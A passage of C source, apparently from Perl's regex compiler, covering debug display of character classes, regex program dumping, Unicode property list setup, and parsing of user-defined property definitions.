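 * 0x00..0x01, is emitted as the individual points "\x00\x01" rather than
 * as a range. */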
STATIC void
S_put_charclass_bitmap_innards_invlist(pTHX_ SV *sv, SV* invlist)
{
/* Concatenate onto the PV in 'sv' a displayable form of the inversion list
* 'invlist' */
UV start, end;
bool allow_literals = TRUE;
PERL_ARGS_ASSERT_PUT_CHARCLASS_BITMAP_INNARDS_INVLIST;
/* Generally, it is more readable if printable characters are output as
* literals, but if a range (nearly) spans all of them, it's best to output
* it as a single range. This code will use a single range if all but 2
* ASCII printables are in it */
invlist_iterinit(invlist);
while (invlist_iternext(invlist, &start, &end)) {
/* If the range starts beyond the final printable, it doesn't have any
* in it */
if (start > MAX_PRINT_A) {
break;
}
/* In both ASCII and EBCDIC, a SPACE is the lowest printable. To span
* all but two, the range must start and end no later than 2 from
* either end */
if (start < ' ' + 2 && end > MAX_PRINT_A - 2) {
if (end > MAX_PRINT_A) {
end = MAX_PRINT_A;
}
if (start < ' ') {
start = ' ';
}
if (end - start >= MAX_PRINT_A - ' ' - 2) {
allow_literals = FALSE;
}
break;
}
}
invlist_iterfinish(invlist);
/* Here we have figured things out. Output each range */
invlist_iterinit(invlist);
while (invlist_iternext(invlist, &start, &end)) {
if (start >= NUM_ANYOF_CODE_POINTS) {
break;
}
put_range(sv, start, end, allow_literals);
}
invlist_iterfinish(invlist);
return;
}
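/* Worked example (hypothetical inversion list): if 'invlist' covers every
 * ASCII printable, 0x20 through 0x7E, the scan above disables literal
 * output (the range spans all but at most two printables), and the whole
 * thing is rendered compactly as "\x20-\x7E" instead of being spelled out
 * one literal character at a time. */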
STATIC SV*
S_put_charclass_bitmap_innards_common(pTHX_
SV* invlist, /* The bitmap */
SV* posixes, /* Under /l, things like [:word:], \S */
SV* only_utf8, /* Under /d, matches iff the target is UTF-8 */
SV* not_utf8, /* /d, matches iff the target isn't UTF-8 */
SV* only_utf8_locale, /* Under /l, matches if the locale is UTF-8 */
const bool invert /* Is the result to be inverted? */
)
{
/* Create and return an SV containing a displayable version of the bitmap
* and associated information determined by the input parameters. If the
* output would have been only the inversion indicator '^', NULL is instead
* returned. */
dVAR;
SV * output;
PERL_ARGS_ASSERT_PUT_CHARCLASS_BITMAP_INNARDS_COMMON;
if (invert) {
output = newSVpvs("^");
}
else {
output = newSVpvs("");
}
/* First, the code points in the bitmap that are unconditionally there */
put_charclass_bitmap_innards_invlist(output, invlist);
/* Traditionally, these have been placed after the main code points */
if (posixes) {
sv_catsv(output, posixes);
}
if (only_utf8 && _invlist_len(only_utf8)) {
Perl_sv_catpvf(aTHX_ output, "%s{utf8}%s", PL_colors[1], PL_colors[0]);
put_charclass_bitmap_innards_invlist(output, only_utf8);
}
if (not_utf8 && _invlist_len(not_utf8)) {
Perl_sv_catpvf(aTHX_ output, "%s{not utf8}%s", PL_colors[1], PL_colors[0]);
put_charclass_bitmap_innards_invlist(output, not_utf8);
}
if (only_utf8_locale && _invlist_len(only_utf8_locale)) {
Perl_sv_catpvf(aTHX_ output, "%s{utf8 locale}%s", PL_colors[1], PL_colors[0]);
put_charclass_bitmap_innards_invlist(output, only_utf8_locale);
/* This is the only list in this routine that can legally contain code
* points outside the bitmap range. The call just above to
* 'put_charclass_bitmap_innards_invlist' will simply suppress them, so
* output them here. There's about a half-dozen possible, and none in
* contiguous ranges longer than 2 */
if (invlist_highest(only_utf8_locale) >= NUM_ANYOF_CODE_POINTS) {
UV start, end;
SV* above_bitmap = NULL;
_invlist_subtract(only_utf8_locale, PL_InBitmap, &above_bitmap);
invlist_iterinit(above_bitmap);
while (invlist_iternext(above_bitmap, &start, &end)) {
UV i;
for (i = start; i <= end; i++) {
put_code_point(output, i);
}
}
invlist_iterfinish(above_bitmap);
SvREFCNT_dec_NN(above_bitmap);
}
}
if (invert && SvCUR(output) == 1) {
return NULL;
}
return output;
}
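/* Illustrative sketch (hypothetical inputs): with 'invert' TRUE and every
 * input list empty, the accumulated output is just the lone "^", so NULL
 * is returned.  With a bitmap inversion list holding 'a' through 'j' and a
 * 'posixes' string of "[:digit:]", the result reads "a-j[:digit:]",
 * preceded by "^" when inverting. */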
STATIC bool
S_put_charclass_bitmap_innards(pTHX_ SV *sv,
char *bitmap,
SV *nonbitmap_invlist,
SV *only_utf8_locale_invlist,
const regnode * const node,
const bool force_as_is_display)
{
/* Appends to 'sv' a displayable version of the innards of the bracketed
* character class defined by the other arguments:
* 'bitmap' points to the bitmap, or NULL if to ignore that.
* 'nonbitmap_invlist' is an inversion list of the code points that are in
* the bitmap range, but for some reason aren't in the bitmap; NULL if
* none. The reasons for this could be that they require some
* condition such as the target string being or not being in UTF-8
* (under /d), or because they came from a user-defined property that
* was not resolved at the time of the regex compilation (under /u)
* 'only_utf8_locale_invlist' is an inversion list of the code points that
* are valid only if the runtime locale is a UTF-8 one; NULL if none
* 'node' is the regex pattern ANYOF node. It is needed only when the
* above two parameters are not null, and is passed so that this
* routine can tease apart the various reasons for them.
* 'force_as_is_display' is TRUE if this routine should definitely NOT try
* to invert things to see if that leads to a cleaner display. If
* FALSE, this routine is free to use its judgment about doing this.
*
* It returns TRUE if there was actually something output. (It may be that
* the bitmap, etc is empty.)
*
* When called for outputting the bitmap of a non-ANYOF node, just pass the
* bitmap, with the succeeding parameters set to NULL, and the final one to
* FALSE.
*/
/* In general, it tries to display the 'cleanest' representation of the
* innards, choosing whether to display them inverted or not, regardless of
* whether the class itself is to be inverted. However, there are some
* cases where it can't try inverting, as what actually matches isn't known
* until runtime, and hence the inversion isn't either. */
dVAR;
bool inverting_allowed = ! force_as_is_display;
int i;
STRLEN orig_sv_cur = SvCUR(sv);
SV* invlist; /* Inversion list we accumulate of code points that
are unconditionally matched */
SV* only_utf8 = NULL; /* Under /d, list of matches iff the target is
UTF-8 */
SV* not_utf8 = NULL; /* /d, list of matches iff the target isn't UTF-8
*/
SV* posixes = NULL; /* Under /l, string of things like [:word:], \D */
SV* only_utf8_locale = NULL; /* Under /l, list of matches if the locale
is UTF-8 */
SV* as_is_display; /* The output string when we take the inputs
literally */
SV* inverted_display; /* The output string when we invert the inputs */
U8 flags = (node) ? ANYOF_FLAGS(node) : 0;
bool invert = cBOOL(flags & ANYOF_INVERT); /* Is the input to be inverted
to match? */
/* We are biased in favor of displaying things without them being inverted,
* as that is generally easier to understand */
const int bias = 5;
PERL_ARGS_ASSERT_PUT_CHARCLASS_BITMAP_INNARDS;
/* Start off with whatever code points are passed in. (We clone, so we
* don't change the caller's list) */
if (nonbitmap_invlist) {
assert(invlist_highest(nonbitmap_invlist) < NUM_ANYOF_CODE_POINTS);
invlist = invlist_clone(nonbitmap_invlist, NULL);
}
else { /* Worst case size is every other code point is matched */
invlist = _new_invlist(NUM_ANYOF_CODE_POINTS / 2);
}
if (flags) {
if (OP(node) == ANYOFD) {
/* This flag indicates that the code points below 0x100 in the
* nonbitmap list are precisely the ones that match only when the
* target is UTF-8 (they should all be non-ASCII). */
if (flags & ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP)
{
_invlist_intersection(invlist, PL_UpperLatin1, &only_utf8);
_invlist_subtract(invlist, only_utf8, &invlist);
}
/* And this flag for matching all non-ASCII 0xFF and below */
if (flags & ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER)
{
not_utf8 = invlist_clone(PL_UpperLatin1, NULL);
}
}
else if (OP(node) == ANYOFL || OP(node) == ANYOFPOSIXL) {
/* If either of these flags are set, what matches isn't
* determinable except during execution, so don't know enough here
* to invert */
if (flags & (ANYOFL_FOLD|ANYOF_MATCHES_POSIXL)) {
inverting_allowed = FALSE;
}
/* What the posix classes match also varies at runtime, so these
* will be output symbolically. */
if (ANYOF_POSIXL_TEST_ANY_SET(node)) {
int i;
posixes = newSVpvs("");
for (i = 0; i < ANYOF_POSIXL_MAX; i++) {
if (ANYOF_POSIXL_TEST(node, i)) {
sv_catpv(posixes, anyofs[i]);
}
}
}
}
}
/* Accumulate the bit map into the unconditional match list */
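/* For example, if bits 0x41 through 0x5A are the only ones set, the loop
 * below coalesces them into the single range 0x41..0x5A before adding it to
 * 'invlist' */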
if (bitmap) {
for (i = 0; i < NUM_ANYOF_CODE_POINTS; i++) {
if (BITMAP_TEST(bitmap, i)) {
int start = i++;
for (;
i < NUM_ANYOF_CODE_POINTS && BITMAP_TEST(bitmap, i);
i++)
{ /* empty */ }
invlist = _add_range_to_invlist(invlist, start, i-1);
}
}
}
/* Make sure that the conditional match lists don't have anything in them
* that match unconditionally; otherwise the output is quite confusing.
* This could happen if the code that populates these misses some
* duplication. */
if (only_utf8) {
_invlist_subtract(only_utf8, invlist, &only_utf8);
}
if (not_utf8) {
_invlist_subtract(not_utf8, invlist, &not_utf8);
}
if (only_utf8_locale_invlist) {
/* Since this list is passed in, we have to make a copy before
* modifying it */
only_utf8_locale = invlist_clone(only_utf8_locale_invlist, NULL);
_invlist_subtract(only_utf8_locale, invlist, &only_utf8_locale);
/* And, it can get really weird for us to try outputting an inverted
* form of this list when it has things above the bitmap, so don't even
* try */
if (invlist_highest(only_utf8_locale) >= NUM_ANYOF_CODE_POINTS) {
inverting_allowed = FALSE;
}
}
/* Calculate what the output would be if we take the input as-is */
as_is_display = put_charclass_bitmap_innards_common(invlist,
posixes,
only_utf8,
not_utf8,
only_utf8_locale,
invert);
/* If have to take the output as-is, just do that */
if (! inverting_allowed) {
if (as_is_display) {
sv_catsv(sv, as_is_display);
SvREFCNT_dec_NN(as_is_display);
}
}
else { /* But otherwise, create the output again on the inverted input, and
use whichever version is shorter */
int inverted_bias, as_is_bias;
/* We will apply our bias to whichever of the results doesn't have
* the '^' */
if (invert) {
invert = FALSE;
as_is_bias = bias;
inverted_bias = 0;
}
else {
invert = TRUE;
as_is_bias = 0;
inverted_bias = bias;
}
/* Now invert each of the lists that contribute to the output,
* excluding from the result things outside the possible range */
/* For the unconditional inversion list, we have to add in all the
* conditional code points, so that when inverted, they will be gone
* from it */
_invlist_union(only_utf8, invlist, &invlist);
_invlist_union(not_utf8, invlist, &invlist);
_invlist_union(only_utf8_locale, invlist, &invlist);
_invlist_invert(invlist);
_invlist_intersection(invlist, PL_InBitmap, &invlist);
if (only_utf8) {
_invlist_invert(only_utf8);
_invlist_intersection(only_utf8, PL_UpperLatin1, &only_utf8);
}
else if (not_utf8) {
/* If a code point matches iff the target string is not in UTF-8,
* then complementing the result has it not match iff not in UTF-8,
* which is the same thing as matching iff it is UTF-8. */
only_utf8 = not_utf8;
not_utf8 = NULL;
}
if (only_utf8_locale) {
_invlist_invert(only_utf8_locale);
_invlist_intersection(only_utf8_locale,
PL_InBitmap,
&only_utf8_locale);
}
inverted_display = put_charclass_bitmap_innards_common(
invlist,
posixes,
only_utf8,
not_utf8,
only_utf8_locale, invert);
/* Use the shortest representation, taking into account our bias
* against showing it inverted */
if ( inverted_display
&& ( ! as_is_display
|| ( SvCUR(inverted_display) + inverted_bias
< SvCUR(as_is_display) + as_is_bias)))
{
sv_catsv(sv, inverted_display);
}
else if (as_is_display) {
sv_catsv(sv, as_is_display);
}
SvREFCNT_dec(as_is_display);
SvREFCNT_dec(inverted_display);
}
SvREFCNT_dec_NN(invlist);
SvREFCNT_dec(only_utf8);
SvREFCNT_dec(not_utf8);
SvREFCNT_dec(posixes);
SvREFCNT_dec(only_utf8_locale);
return SvCUR(sv) > orig_sv_cur;
}
#define CLEAR_OPTSTART \
if (optstart) STMT_START { \
DEBUG_OPTIMISE_r(Perl_re_printf( aTHX_ \
" (%" IVdf " nodes)\n", (IV)(node - optstart))); \
optstart=NULL; \
} STMT_END
#define DUMPUNTIL(b,e) \
CLEAR_OPTSTART; \
node=dumpuntil(r,start,(b),(e),last,sv,indent+1,depth+1);
STATIC const regnode *
S_dumpuntil(pTHX_ const regexp *r, const regnode *start, const regnode *node,
const regnode *last, const regnode *plast,
SV* sv, I32 indent, U32 depth)
{
U8 op = PSEUDO; /* Arbitrary non-END op. */
const regnode *next;
const regnode *optstart= NULL;
RXi_GET_DECL(r, ri);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_DUMPUNTIL;
#ifdef DEBUG_DUMPUNTIL
Perl_re_printf( aTHX_ "--- %d : %d - %d - %d\n", indent, node-start,
last ? last-start : 0, plast ? plast-start : 0);
#endif
if (plast && plast < last)
last= plast;
while (PL_regkind[op] != END && (!last || node < last)) {
assert(node);
/* While that wasn't END last time... */
NODE_ALIGN(node);
op = OP(node);
if (op == CLOSE || op == SRCLOSE || op == WHILEM)
indent--;
next = regnext((regnode *)node);
/* Where, what. */
if (OP(node) == OPTIMIZED) {
if (!optstart && RE_DEBUG_FLAG(RE_DEBUG_COMPILE_OPTIMISE))
optstart = node;
else
goto after_print;
} else
CLEAR_OPTSTART;
regprop(r, sv, node, NULL, NULL);
Perl_re_printf( aTHX_ "%4" IVdf ":%*s%s", (IV)(node - start),
(int)(2*indent + 1), "", SvPVX_const(sv));
if (OP(node) != OPTIMIZED) {
if (next == NULL) /* Next ptr. */
Perl_re_printf( aTHX_ " (0)");
else if (PL_regkind[(U8)op] == BRANCH
&& PL_regkind[OP(next)] != BRANCH )
Perl_re_printf( aTHX_ " (FAIL)");
else
Perl_re_printf( aTHX_ " (%" IVdf ")", (IV)(next - start));
Perl_re_printf( aTHX_ "\n");
}
after_print:
if (PL_regkind[(U8)op] == BRANCHJ) {
assert(next);
{
const regnode *nnode = (OP(next) == LONGJMP
? regnext((regnode *)next)
: next);
if (last && nnode > last)
nnode = last;
DUMPUNTIL(NEXTOPER(NEXTOPER(node)), nnode);
}
}
else if (PL_regkind[(U8)op] == BRANCH) {
assert(next);
DUMPUNTIL(NEXTOPER(node), next);
}
else if ( PL_regkind[(U8)op] == TRIE ) {
const regnode *this_trie = node;
const char op = OP(node);
const U32 n = ARG(node);
const reg_ac_data * const ac = op>=AHOCORASICK ?
(reg_ac_data *)ri->data->data[n] :
NULL;
const reg_trie_data * const trie =
(reg_trie_data*)ri->data->data[op<AHOCORASICK ? n : ac->trie];
#ifdef DEBUGGING
AV *const trie_words
= MUTABLE_AV(ri->data->data[n + TRIE_WORDS_OFFSET]);
#endif
const regnode *nextbranch= NULL;
I32 word_idx;
SvPVCLEAR(sv);
for (word_idx= 0; word_idx < (I32)trie->wordcount; word_idx++) {
SV ** const elem_ptr = av_fetch(trie_words, word_idx, 0);
Perl_re_indentf( aTHX_ "%s ",
indent+3,
elem_ptr
? pv_pretty(sv, SvPV_nolen_const(*elem_ptr),
SvCUR(*elem_ptr), PL_dump_re_max_len,
PL_colors[0], PL_colors[1],
(SvUTF8(*elem_ptr)
? PERL_PV_ESCAPE_UNI
: 0)
| PERL_PV_PRETTY_ELLIPSES
| PERL_PV_PRETTY_LTGT
)
: "???"
);
if (trie->jump) {
U16 dist= trie->jump[word_idx+1];
Perl_re_printf( aTHX_ "(%" UVuf ")\n",
(UV)((dist ? this_trie + dist : next) - start));
if (dist) {
if (!nextbranch)
nextbranch= this_trie + trie->jump[0];
DUMPUNTIL(this_trie + dist, nextbranch);
}
if (nextbranch && PL_regkind[OP(nextbranch)]==BRANCH)
nextbranch= regnext((regnode *)nextbranch);
} else {
Perl_re_printf( aTHX_ "\n");
}
}
if (last && next > last)
node= last;
else
node= next;
}
else if ( op == CURLY ) { /* "next" might be very big: optimizer */
DUMPUNTIL(NEXTOPER(node) + EXTRA_STEP_2ARGS,
NEXTOPER(node) + EXTRA_STEP_2ARGS + 1);
}
else if (PL_regkind[(U8)op] == CURLY && op != CURLYX) {
assert(next);
DUMPUNTIL(NEXTOPER(node) + EXTRA_STEP_2ARGS, next);
}
else if ( op == PLUS || op == STAR) {
DUMPUNTIL(NEXTOPER(node), NEXTOPER(node) + 1);
}
else if (PL_regkind[(U8)op] == EXACT) {
/* Literal string, where present. */
node += NODE_SZ_STR(node) - 1;
node = NEXTOPER(node);
}
else {
node = NEXTOPER(node);
node += regarglen[(U8)op];
}
if (op == CURLYX || op == OPEN || op == SROPEN)
indent++;
}
CLEAR_OPTSTART;
#ifdef DEBUG_DUMPUNTIL
Perl_re_printf( aTHX_ "--- %d\n", (int)indent);
#endif
return node;
}
#endif /* DEBUGGING */
#ifndef PERL_IN_XSUB_RE
#include "uni_keywords.h"
void
Perl_init_uniprops(pTHX)
{
dVAR;
PL_user_def_props = newHV();
#ifdef USE_ITHREADS
HvSHAREKEYS_off(PL_user_def_props);
PL_user_def_props_aTHX = aTHX;
#endif
/* Set up the inversion list global variables */
PL_XPosix_ptrs[_CC_ASCII] = _new_invlist_C_array(uni_prop_ptrs[UNI_ASCII]);
PL_XPosix_ptrs[_CC_ALPHANUMERIC] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXALNUM]);
PL_XPosix_ptrs[_CC_ALPHA] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXALPHA]);
PL_XPosix_ptrs[_CC_BLANK] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXBLANK]);
PL_XPosix_ptrs[_CC_CASED] = _new_invlist_C_array(uni_prop_ptrs[UNI_CASED]);
PL_XPosix_ptrs[_CC_CNTRL] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXCNTRL]);
PL_XPosix_ptrs[_CC_DIGIT] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXDIGIT]);
PL_XPosix_ptrs[_CC_GRAPH] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXGRAPH]);
PL_XPosix_ptrs[_CC_LOWER] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXLOWER]);
PL_XPosix_ptrs[_CC_PRINT] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXPRINT]);
PL_XPosix_ptrs[_CC_PUNCT] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXPUNCT]);
PL_XPosix_ptrs[_CC_SPACE] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXSPACE]);
PL_XPosix_ptrs[_CC_UPPER] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXUPPER]);
PL_XPosix_ptrs[_CC_VERTSPACE] = _new_invlist_C_array(uni_prop_ptrs[UNI_VERTSPACE]);
PL_XPosix_ptrs[_CC_WORDCHAR] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXWORD]);
PL_XPosix_ptrs[_CC_XDIGIT] = _new_invlist_C_array(uni_prop_ptrs[UNI_XPOSIXXDIGIT]);
PL_Posix_ptrs[_CC_ASCII] = _new_invlist_C_array(uni_prop_ptrs[UNI_ASCII]);
PL_Posix_ptrs[_CC_ALPHANUMERIC] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXALNUM]);
PL_Posix_ptrs[_CC_ALPHA] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXALPHA]);
PL_Posix_ptrs[_CC_BLANK] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXBLANK]);
PL_Posix_ptrs[_CC_CASED] = PL_Posix_ptrs[_CC_ALPHA];
PL_Posix_ptrs[_CC_CNTRL] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXCNTRL]);
PL_Posix_ptrs[_CC_DIGIT] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXDIGIT]);
PL_Posix_ptrs[_CC_GRAPH] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXGRAPH]);
PL_Posix_ptrs[_CC_LOWER] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXLOWER]);
PL_Posix_ptrs[_CC_PRINT] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXPRINT]);
PL_Posix_ptrs[_CC_PUNCT] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXPUNCT]);
PL_Posix_ptrs[_CC_SPACE] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXSPACE]);
PL_Posix_ptrs[_CC_UPPER] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXUPPER]);
PL_Posix_ptrs[_CC_VERTSPACE] = NULL;
PL_Posix_ptrs[_CC_WORDCHAR] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXWORD]);
PL_Posix_ptrs[_CC_XDIGIT] = _new_invlist_C_array(uni_prop_ptrs[UNI_POSIXXDIGIT]);
PL_GCB_invlist = _new_invlist_C_array(_Perl_GCB_invlist);
PL_SB_invlist = _new_invlist_C_array(_Perl_SB_invlist);
PL_WB_invlist = _new_invlist_C_array(_Perl_WB_invlist);
PL_LB_invlist = _new_invlist_C_array(_Perl_LB_invlist);
PL_SCX_invlist = _new_invlist_C_array(_Perl_SCX_invlist);
PL_AboveLatin1 = _new_invlist_C_array(AboveLatin1_invlist);
PL_Latin1 = _new_invlist_C_array(Latin1_invlist);
PL_UpperLatin1 = _new_invlist_C_array(UpperLatin1_invlist);
PL_Assigned_invlist = _new_invlist_C_array(uni_prop_ptrs[UNI_ASSIGNED]);
PL_utf8_perl_idstart = _new_invlist_C_array(uni_prop_ptrs[UNI__PERL_IDSTART]);
PL_utf8_perl_idcont = _new_invlist_C_array(uni_prop_ptrs[UNI__PERL_IDCONT]);
PL_utf8_charname_begin = _new_invlist_C_array(uni_prop_ptrs[UNI__PERL_CHARNAME_BEGIN]);
PL_utf8_charname_continue = _new_invlist_C_array(uni_prop_ptrs[UNI__PERL_CHARNAME_CONTINUE]);
PL_in_some_fold = _new_invlist_C_array(uni_prop_ptrs[UNI__PERL_ANY_FOLDS]);
PL_HasMultiCharFold = _new_invlist_C_array(uni_prop_ptrs[
UNI__PERL_FOLDS_TO_MULTI_CHAR]);
PL_InMultiCharFold = _new_invlist_C_array(uni_prop_ptrs[
UNI__PERL_IS_IN_MULTI_CHAR_FOLD]);
PL_NonFinalFold = _new_invlist_C_array(uni_prop_ptrs[
UNI__PERL_NON_FINAL_FOLDS]);
PL_utf8_toupper = _new_invlist_C_array(Uppercase_Mapping_invlist);
PL_utf8_tolower = _new_invlist_C_array(Lowercase_Mapping_invlist);
PL_utf8_totitle = _new_invlist_C_array(Titlecase_Mapping_invlist);
PL_utf8_tofold = _new_invlist_C_array(Case_Folding_invlist);
PL_utf8_tosimplefold = _new_invlist_C_array(Simple_Case_Folding_invlist);
PL_utf8_foldclosures = _new_invlist_C_array(_Perl_IVCF_invlist);
PL_utf8_mark = _new_invlist_C_array(uni_prop_ptrs[UNI_M]);
PL_CCC_non0_non230 = _new_invlist_C_array(_Perl_CCC_non0_non230_invlist);
PL_Private_Use = _new_invlist_C_array(uni_prop_ptrs[UNI_CO]);
#ifdef UNI_XIDC
/* The below are used only by deprecated functions. They could be removed */
PL_utf8_xidcont = _new_invlist_C_array(uni_prop_ptrs[UNI_XIDC]);
PL_utf8_idcont = _new_invlist_C_array(uni_prop_ptrs[UNI_IDC]);
PL_utf8_xidstart = _new_invlist_C_array(uni_prop_ptrs[UNI_XIDS]);
#endif
}
#if 0
This code was mainly added for backcompat to give a warning for non-portable
code points in user-defined properties. But experiments showed that the
warning in earlier perls was only omitted on overflow, which should be an
error, so there really isn't a backcompat issue, and actually adding the
warning when none was present before might cause breakage, for little gain. So
khw left this code in, but not enabled. Tests were never added.
embed.fnc entry:
Ei |const char *|get_extended_utf8_msg|const UV cp
PERL_STATIC_INLINE const char *
S_get_extended_utf8_msg(pTHX_ const UV cp)
{
U8 dummy[UTF8_MAXBYTES + 1];
HV *msgs;
SV **msg;
uvchr_to_utf8_flags_msgs(dummy, cp, UNICODE_WARN_PERL_EXTENDED,
&msgs);
msg = hv_fetchs(msgs, "text", 0);
assert(msg);
(void) sv_2mortal((SV *) msgs);
return SvPVX(*msg);
}
#endif
SV *
Perl_handle_user_defined_property(pTHX_
/* Parses the contents of a user-defined property definition, returning the
* expanded definition if possible. If so, the return is an inversion
* list.
*
* If there are subroutines that are part of the expansion and which aren't
* known at the time of the call to this function, this returns what
* parse_uniprop_string() returned for the first one encountered.
*
* If an error was found, NULL is returned, and 'msg' gets a suitable
* message appended to it. (Appending allows the back trace of how we got
* to the faulty definition to be displayed through nested calls of
* user-defined subs.)
*
* The caller IS responsible for freeing any returned SV.
*
* The syntax of the contents is pretty much described in perlunicode.pod,
* but we also allow comments on each line */
const char * name, /* Name of property */
const STRLEN name_len, /* The name's length in bytes */
const bool is_utf8, /* ? Is 'name' encoded in UTF-8 */
const bool to_fold, /* ? Is this under /i */
const bool runtime, /* ? Are we in compile- or run-time */
const bool deferrable, /* Is it ok for this property's full definition
to be deferred until later? */
SV* contents, /* The property's definition */
bool *user_defined_ptr, /* This will be set TRUE as we wouldn't be
getting called unless this is thought to be
a user-defined property */
SV * msg, /* Any error or warning msg(s) are appended to
this */
const STRLEN level) /* Recursion level of this call */
{
STRLEN len;
const char * string = SvPV_const(contents, len);
const char * const e = string + len;
const bool is_contents_utf8 = cBOOL(SvUTF8(contents));
const STRLEN msgs_length_on_entry = SvCUR(msg);
const char * s0 = string; /* Points to first byte in the current line
being parsed in 'string' */
const char overflow_msg[] = "Code point too large in \"";
SV* running_definition = NULL;
PERL_ARGS_ASSERT_HANDLE_USER_DEFINED_PROPERTY;
*user_defined_ptr = TRUE;
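/* An illustrative (hypothetical) example of contents this loop accepts; each
 * line is a hex code point, a blank-separated range, or another property
 * name, optionally preceded by one of the operators '+', '-', '&', or '!',
 * and optionally followed by a '#' comment:
 *
 *      0041 005A   # A through Z
 *      00DF
 *      +utf8::InGreek
 *      -0370
 */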
/* Look at each line */
while (s0 < e) {
const char * s; /* Current byte */
char op = '+'; /* Default operation is 'union' */
IV min = 0; /* range begin code point */
IV max = -1; /* and range end */
SV* this_definition;
/* Skip comment lines */
if (*s0 == '#') {
s0 = strchr(s0, '\n');
if (s0 == NULL) {
break;
}
s0++;
continue;
}
/* For backcompat, allow an empty first line */
if (*s0 == '\n') {
s0++;
continue;
}
/* First character in the line may optionally be the operation */
if ( *s0 == '+'
|| *s0 == '!'
|| *s0 == '-'
|| *s0 == '&')
{
op = *s0++;
}
/* If the line is one or two hex numbers separated by blank space, it's
* a range; otherwise it is either another user-defined property or an
* error */
s = s0;
if (! isXDIGIT(*s)) {
goto check_if_property;
}
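/* Each iteration below shifts 'min' left by 4 bits before adding the next
 * hex digit, so once 'min' exceeds MAX_LEGAL_CP >> 4, accepting another
 * digit would push it past the largest legal code point; the check below
 * then bails out with an overflow message */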
do { /* Each new hex digit will add 4 bits. */
if (min > ( (IV) MAX_LEGAL_CP >> 4)) {
s = strchr(s, '\n');
if (s == NULL) {
s = e;
}
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpv(msg, overflow_msg);
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f,
UTF8fARG(is_contents_utf8, s - s0, s0));
sv_catpvs(msg, "\"");
goto return_failure;
}
/* Accumulate this digit into the value */
min = (min << 4) + READ_XDIGIT(s);
} while (isXDIGIT(*s));
while (isBLANK(*s)) { s++; }
/* We allow comments at the end of the line */
if (*s == '#') {
s = strchr(s, '\n');
if (s == NULL) {
s = e;
}
s++;
}
else if (s < e && *s != '\n') {
if (! isXDIGIT(*s)) {
goto check_if_property;
}
/* Look for the high point of the range */
max = 0;
do {
if (max > ( (IV) MAX_LEGAL_CP >> 4)) {
s = strchr(s, '\n');
if (s == NULL) {
s = e;
}
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpv(msg, overflow_msg);
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f,
UTF8fARG(is_contents_utf8, s - s0, s0));
sv_catpvs(msg, "\"");
goto return_failure;
}
max = (max << 4) + READ_XDIGIT(s);
} while (isXDIGIT(*s));
while (isBLANK(*s)) { s++; }
if (*s == '#') {
s = strchr(s, '\n');
if (s == NULL) {
s = e;
}
}
else if (s < e && *s != '\n') {
goto check_if_property;
}
}
if (max == -1) { /* The line only had one entry */
max = min;
}
else if (max < min) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Illegal range in \"");
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f,
UTF8fARG(is_contents_utf8, s - s0, s0));
sv_catpvs(msg, "\"");
goto return_failure;
}
#if 0 /* See explanation at definition above of get_extended_utf8_msg() */
if ( UNICODE_IS_PERL_EXTENDED(min)
|| UNICODE_IS_PERL_EXTENDED(max))
{
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
/* If both code points are non-portable, warn only on the lower
* one. */
sv_catpv(msg, get_extended_utf8_msg(
(UNICODE_IS_PERL_EXTENDED(min))
? min : max));
sv_catpvs(msg, " in \"");
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f,
UTF8fARG(is_contents_utf8, s - s0, s0));
sv_catpvs(msg, "\"");
}
#endif
/* Here, this line contains a legal range */
this_definition = sv_2mortal(_new_invlist(2));
this_definition = _add_range_to_invlist(this_definition, min, max);
goto calculate;
check_if_property:
/* Here it isn't a legal range line. See if it is a legal property
* line. First find the end of the meat of the line */
s = strpbrk(s, "#\n");
if (s == NULL) {
s = e;
}
/* Ignore trailing blanks in keeping with the requirements of
* parse_uniprop_string() */
s--;
while (s > s0 && isBLANK_A(*s)) {
s--;
}
s++;
this_definition = parse_uniprop_string(s0, s - s0,
is_utf8, to_fold, runtime,
deferrable,
user_defined_ptr, msg,
(name_len == 0)
? level /* Don't increase level
if input is empty */
: level + 1
);
if (this_definition == NULL) {
goto return_failure; /* 'msg' should have had the reason
appended to it by the above call */
}
if (! is_invlist(this_definition)) { /* Unknown at this time */
return newSVsv(this_definition);
}
if (*s != '\n') {
s = strchr(s, '\n');
if (s == NULL) {
s = e;
}
}
calculate:
switch (op) {
case '+':
_invlist_union(running_definition, this_definition,
&running_definition);
break;
case '-':
_invlist_subtract(running_definition, this_definition,
&running_definition);
break;
case '&':
